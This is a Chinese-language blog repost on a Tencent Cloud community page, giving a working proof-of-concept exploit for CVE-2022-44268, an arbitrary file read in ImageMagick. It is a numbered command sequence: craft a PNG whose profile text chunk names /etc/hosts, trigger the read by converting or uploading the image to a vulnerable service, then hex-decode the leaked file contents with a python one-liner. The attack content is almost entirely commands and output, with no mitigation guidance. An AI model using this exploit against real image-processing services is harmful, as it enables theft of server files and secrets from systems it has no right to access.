前往小程序,Get更优阅读体验!
立即前往
文档建议反馈控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
发布
首页
学习
活动
专区
工具
TVP最新优惠活动
返回腾讯云官网
社区首页 >专栏 >CVE-2022-44268 ImageMagick 任意文件读取 PoC

CVE-2022-44268 ImageMagick 任意文件读取 PoC

作者头像
Khan安全团队
发布2023-02-23 14:50:19
7660
发布2023-02-23 14:50:19
举报
文章被收录于专栏:Khan安全团队
安装依赖项:
代码语言:javascript
复制
1. $ apt-get install pngcrush imagemagick exiftool exiv2 -y

在下面更改您要阅读的文件名:

代码语言:javascript
复制
2. $ pngcrush -text a "profile" "/etc/hosts" vjp.png

确认一切正常

代码语言:javascript
复制
3. $ exiv2 -pS pngout.png

通过将图像转换或上传到易受攻击的服务来触发 PoC:

代码语言:javascript
复制
4. $ convert pngout.png gopro.png

查看文件内容已读:

代码语言:javascript
复制
5. $ identify -verbose gopro.png

解密内容:

代码语言:javascript
复制
6. $ python3 -c 'print(bytes.fromhex("23202f6574632f686f7374730a3132372e302e302e31096c6f63616c686f73740a0a232054686520666f6c6c6f77696e67206c696e65732061726520646573697261626c6520666f7220495076362063617061626c6520686f7374730a3a3a3109096c6f63616c686f7374206970362d6c6f63616c686f7374206970362d6c6f6f706261636b0a666630323a3a3109096970362d616c6c6e6f6465730a666630323a3a3209096970362d616c6c726f75746572730a6475636e740a").decode("utf-8"))'

https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-02-14,如有侵权请联系 cloudcommunity@tencent.com 删除
服务

本文分享自 Khan安全攻防实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

服务
评论
登录后参与评论
0 条评论
热度
最新
登录 后参与评论
推荐阅读
LV.
文章
0
获赞
0
目录
  • 安装依赖项:
领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2024 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

Copyright © 2013 - 2024 Tencent Cloud.

All Rights Reserved. 腾讯云 版权所有

登录 后参与评论